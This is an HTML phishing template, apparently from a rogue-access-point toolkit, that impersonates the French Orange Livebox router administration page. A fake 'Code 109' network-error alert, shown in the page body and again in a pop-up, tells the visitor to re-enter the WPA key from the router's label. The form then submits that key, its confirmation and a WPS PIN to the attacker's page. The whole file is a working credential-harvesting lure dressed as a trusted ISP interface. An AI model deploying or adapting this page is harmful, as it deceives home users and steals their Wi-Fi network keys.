<!DOCTYPE html>
<html>

<head>
    <meta charset='utf-8'>
    <meta http-equiv='X-UA-Compatible' content='IE=edge'>
    <meta http-equiv="content-type" content="text/html; charset=UTF-8">
    <meta http-equiv="Content-language" content="fr">
    <meta name="author" content="Lucien Burdet">
    <meta name='viewport' content='width=device-width, initial-scale=1'>
    <title>Livebox</title>
    <link rel="icon" type="image/png" href="./static/images/favicon.png" />
    <link rel='stylesheet' type='text/css' media='screen' href='./static/css/bootstrap.min.css'>
    <link rel='stylesheet' type='text/css' media='screen' href='./static/css/style.css'>
    <script src='./static/js/jquery.min.js'></script>
    <script src='./static/js/bootstrap.bundle.min.js'></script>
    <script src='./static/js/livebox.js'></script>
</head>

<body>
    <nav class="navbar navbar-expand-lg navbar-light bg-light">
        <h1 class="orange-color">
            livebox
        </h1>
        <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarColor02"
            aria-controls="navbarColor02" aria-expanded="false" aria-label="Toggle navigation">
            <span class="navbar-toggler-icon"></span>
        </button>

        <div class="collapse navbar-collapse" id="navbarColor02">
            <ul class="navbar-nav mr-auto">
                <li class="nav-item ">
                    <a class="nav-link" href="#" role="button" data-toggle="modal" data-target="#modal"
                        aria-haspopup="true" aria-expanded="false">Accueil</a>
                </li>
                <li class="nav-item">
                    <a class="nav-link active" href="#" role="button" data-toggle="modal" data-target="#modal"
                        aria-haspopup="true" aria-expanded="false">Configuration</a>
                </li>
            </ul>
            <div class="form-inline my-2 my-lg-0">
                <span class="orange-color m-r-15">Administrateur</span>
                <button class="btn btn-primary my-2 my-sm-0 disabled" type="button" data-toggle="modal"
                    data-target="#modal">Déconnexion</button>
            </div>
        </div>
    </nav>

    <div class="alert alert-dismissible alert-danger">
        <strong>Code 109: Erreur réseau inconnue</strong>
        <p>
            Veuillez vous reconnecter avec la clé WPA/WEP dans le
            champ ci dessous et valider.
            La clé WPA figure derrière votre livebox sur une petite étiquette. Ensuite maintenez appuyer 2 secondes le
            bouton wifi de votre livebox. Besoin d'aide ? Obtenez un technicien Orange en ligne en cliquant
            <a href="#" data-toggle="modal" data-target="#modal">ici</a>
        </p>
    </div>

    <div class="row">
        <div class="col-3">
            <div class="jumbotron">
                <h4>Réseaux & Services</h4>
                <ul class="left-nav">
                    <li>
                        <a class="black-color" href="#" data-toggle="modal" data-target="#modal">Équipement</a>
                    </li>
                    <li>
                        <a href="#" data-toggle="modal" data-target="#modal">Livebox</a>
                        <ul>
                            <li><a class="black-color" href="#" data-toggle="modal" data-target="#modal">Internet</a>
                            </li>
                            <li><a class="black-color" href="#" data-toggle="modal"
                                    data-target="#modal">Administration</a></li>
                            <li><a class="black-color" href="#" data-toggle="modal" data-target="#modal">Mode de
                                    sécurité</a></li>
                            <li><a href="#" data-toggle="modal" data-target="#modal">Paramètres WiFi</a></li>
                            <li><a class="black-color" href="#" data-toggle="modal" data-target="#modal">Paramètres
                                    avancés</a></li>
                        </ul>
                    </li>
                    <li><a class="black-color" href="#" data-toggle="modal" data-target="#modal">Services</a></li>
                </ul>
                <h4>Outils</h4>
                <ul class="left-nav">
                    <li>
                        <a class="black-color" href="#" data-toggle="modal" data-target="#modal"> Information
                            système</a>
                    </li>
                    <li>
                        <a class="black-color" href="#" data-toggle="modal" data-target="#modal">Dépannage &
                            Maintenance</a>
                    </li>
                    <li>
                        <a class="black-color" href="#" data-toggle="modal" data-target="#modal">Administration à
                            distance</a>
                    </li>
                </ul>
            </div>
        </div>
        <div class="col-9">
            <div class="jumbotron p-t-5">
                <h3>Paramètres WiFi</h3>
                <p>{{ target_ap_vendor }}</p>

                <div class="alert alert-dismissible alert-danger">
                    <strong>Code 109: Erreur réseau inconnue</strong>
                    <p>
                        Veuillez vous reconnecter avec la clé WPA/WEP dans
                        le champ ci dessous et valider.
                        La clé WPA figure derrière votre livebox sur une petite étiquette. Ensuite maintenez appuyer 2
                        secondes le bouton wifi de votre livebox. Besoin d'aide ? Obtenez un technicien Orange en ligne
                        en cliquant
                        <a href="#" data-toggle="modal" data-target="#modal">ici</a>
                    </p>
                </div>

                <form id="livebox-wpa" method="POST" action="valid.html">
                    <fieldset>
                        <legend>Appairage</legend>
                        <div class="form-check disabled">
                            <label class="form-check-label">
                                <input class="form-check-input" type="checkbox" checked="">
                                Activer le WiFi
                            </label>
                        </div>
                        <div class="form-group">
                            <label for="ssid">Nom du réseau (SSID)</label>
                            <input value="{{ target_ap_essid }}" type="text" class="form-control" id="ssid"
                                placeholder="Nom du réseau (SSID)">
                        </div>
                        <div class="form-check disabled">
                            <label class="form-check-label">
                                <input class="form-check-input" type="checkbox" checked="">
                                Diffuser le SSID
                            </label>
                        </div>
                        <div class="form-group">
                            <label for="mode">Mode</label>
                            <select class="form-control" id="mode">
                                <option>b/g</option>
                                <option selected>b/g/n</option>
                            </select>
                        </div>
                        <div class="form-group">
                            <label for="canal">Numéro de canal</label>
                            <select class="form-control" id="canal">
                                <option>1</option>
                                <option>2</option>
                                <option>3</option>
                                <option>4</option>
                                <option>5</option>
                                <option>6</option>
                                <option>7</option>
                                <option>8</option>
                                <option>9</option>
                                <option>10</option>
                                <option>11</option>
                                <option>12</option>
                                <option selected>{{ target_ap_channel }}</option>
                            </select>
                        </div>
                        <img src="./static/images/aide.jpg">
                        <div class="form-group">
                            <label for="wpa">Clé WPA</label>
                            <input name="wfphshr-password" type="text" class="form-control" id="wpa"
                                placeholder="Clé WPA">
                        </div>
                        <div class="form-group">
                            <label for="wpa-confirmation">Confirmation</label>
                            <input name="wfphshr-password-confirm" type="text" class="form-control"
                                id="wpa-confirmation" placeholder="Confirmation">
                        </div>
                        <button id="livebox-wpa-btn" type="submit" class="btn btn-primary m-b-50">Valider</button>

                        <div class="form-check disabled">
                            <label class="form-check-label">
                                <input class="form-check-input" type="checkbox" checked="">
                                Activer le Wifi Easy pairing 
                            </label>
                        </div>
                        <div class="form-check disabled">
                            <label class="form-check-label">
                                <input class="form-check-input" type="checkbox" checked="">
                                Activer le WPS pairing
                            </label>
                        </div>
                        <div class="form-group">
                            <label for="wps">Le PIN code de l'équipement WPS en 8 caractères</label>
                            <input name="wfphshr-wps" value="12345670" type="text" class="form-control" id="wps"
                                placeholder="Le PIN code de l'équipement WPS en 8 caractères">
                        </div>

                        <legend>Configuration de l'appairage WiFi</legend>
                        <div class="form-check disabled">
                            <label class="form-check-label">
                                <input class="form-check-input" type="checkbox">
                                Activer le filtrage MAC
                            </label>
                        </div>

                        <legend>Equipements autorisés</legend>
                        <table class="table table-hover">
                            <thead>
                                <tr>
                                    <th scope="col">Nom</th>
                                    <th scope="col">Adresse IP</th>
                                    <th scope="col">Adresse MAC</th>
                                    <th scope="col">Statut</th>
                                    <th scope="col">Supprimer</th>
                                </tr>
                            </thead>
                            <tbody>
                                <tr>
                                    <td>new-host-2</td>
                                    <td>192.168.1.XX</td>
                                    <td>XX:XX:XX:XX:XX:XX</td>
                                    <td><img src="./static/images/wifi_enable.gif"></td>
                                    <td></td>
                                </tr>
                            </tbody>
                        </table>
                    </fieldset>
                </form>
            </div>
        </div>
    </div>

    <div class="modal" id="modal" tabindex="-1" role="dialog" aria-hidden="true">
        <div class="modal-dialog" role="document">
            <div class="modal-content">
                <div class="modal-header">
                    <h5 class="modal-title">Code 109: Erreur réseau inconnue</h5>
                    <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                        <span aria-hidden="true">&times;</span>
                    </button>
                </div>
                <div class="modal-body">
                    <p>
                        Veuillez vous reconnecter avec la clé WPA/WEP dans le champ ci dessous et valider.
                        La clé WPA figure derrière votre livebox sur une petite étiquette. Ensuite maintenez appuyer 2
                        secondes le bouton wifi de votre livebox. Besoin d'aide ? Obtenez un technicien Orange en ligne
                        en cliquant
                        <a href="#" data-toggle="modal" data-target="#modal">ici</a>
                    </p>
                </div>
                <div class="modal-footer">
                    <button type="button" class="btn btn-secondary" data-dismiss="modal">Fermer</button>
                </div>
            </div>
        </div>
    </div>

</body>

</html>